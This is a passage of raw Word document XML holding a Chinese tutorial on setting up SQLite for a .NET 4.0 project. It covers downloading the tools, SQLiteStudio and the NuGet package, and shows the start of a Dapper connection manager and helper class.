      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作系统，VS2017，.</w:t>
      </w:r>
      <w:r>
        <w:t>NET 4.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(要兼容X</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.sqlite.org/download.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:t>https://www.sqlite.org/download.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载这两个文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6645910" cy="1194435"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35" name="图片 35" descr="C:\Users\t450\Desktop\QQ截图20190305163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t450\Desktop\QQ截图2019030516342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645910" cy="1194790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解压第一个文件会得到sqlite的dll文件，解压第二个会得到</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.sqlite.org/sqldiff.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:t>sqldiff.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示SQLite数据库之间的差异</w:t>
      </w:r>
      <w:r>
        <w:t>)，</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.sqlite.org/cli.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:t>sqlite3.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令行工具</w:t>
      </w:r>
      <w:r>
        <w:t>)，</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.sqlite.org/sqlanalyze.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:t>sqlite3_analyzer.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示使用sqlite数据库文件的单个表和索引使用的空间大小和效率</w:t>
      </w:r>
      <w:r>
        <w:t>)，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后把这几个文件复制到同一个文件夹下，再把这个文件夹设置为环境变量。再打开命令提示符，输入sqlite</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示版本号就说明设置的是正确的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4389120" cy="866775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39" name="图片 39" descr="C:\Users\t450\Documents\Tencent Files\917563264\Image\SharePic\2019030516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t450\Documents\Tencent Files\917563264\Image\SharePic\201903051648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389120" cy="866775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是命令行工具开发起来效率不高，怎么办呢？当然是在借助一下数据库管理工具啦，我选择的是</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.xue51.com/soft/4831.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:t>SQLiteStudio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个工具，用起来也蛮方便的，具体使用方法它的下载页面都有。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6645910" cy="3383915"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40" name="图片 40" descr="C:\Users\t450\Desktop\QQ截图20190305165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t450\Desktop\QQ截图2019030516523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645910" cy="3383945"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接着我们就可以打开VS新建一个项目，然后打开它的Nuget，搜索</w:t>
      </w:r>
      <w:r>
        <w:t>Sqlite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的ADO</w:t>
      </w:r>
      <w:r>
        <w:t>.NET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包并安装它</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6645910" cy="2135505"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="41" name="图片 41" descr="C:\Users\t450\Desktop\QQ截图20190305165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t450\Desktop\QQ截图2019030516560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645910" cy="2136104"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了方便起见我又下载了d</w:t>
      </w:r>
      <w:r>
        <w:t>apper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个ORM工具，借助以前写过的帮助类，就能查询，修改数据库了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>帮助类如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:t>apperManage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接类</w:t>
      </w:r>
      <w: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using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> System.Configuration;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using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> System.Data;</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using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> System.Data.SQLite;</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namespace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>XCYN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>.Common.Dapper</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class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>DapperManager</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string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> connectionString = ConfigurationManager.ConnectionStrings[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"XXX"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>].ConnectionString;</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private</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IDbConnection _instance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private</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object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> _lock = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>new</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object</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private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> DapperManager()</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连接实例</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&lt;returns&gt;&lt;/returns&gt;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IDbConnection GetConnection()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if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> (_instance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lock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> (_lock)</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if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> (_instance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8000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>SQLServer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>数据库</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8000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>//_instance = new SqlConnection(connectionString);</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_instance = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQLiteConnection(connectionString);</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return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> _instance;</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DapperHelper执行Sqlite命令：</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using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dapper;</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using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> System;</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using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> System.Collections.Generic;</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using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> System.Data;</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namespace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> XCYN.Common.Dapper</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增删改查命令</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class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>DapperHelper</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添加操作</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sql</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param</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transaction</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&lt;returns&gt;&lt;/returns&gt;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int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> Execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> sql,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> param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 xml:space="preserve">,IDbTransaction transaction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int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> count = 0;</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IDbConnection conn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try</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conn = Dapper.DapperManager.GetConnection();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conn.Open();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count = conn.Execute(sql, param, transaction);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return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> count;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catch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(Exception ex)</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8000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>封装异常处理</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throw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> ex;</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finally</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conn.Close();</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查询</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&lt;typeparam name="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"&gt;&lt;/typeparam&gt;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sql</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param</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transaction</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&lt;returns&gt;&lt;/returns&gt;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List&lt;T&gt; Query&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&gt;(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
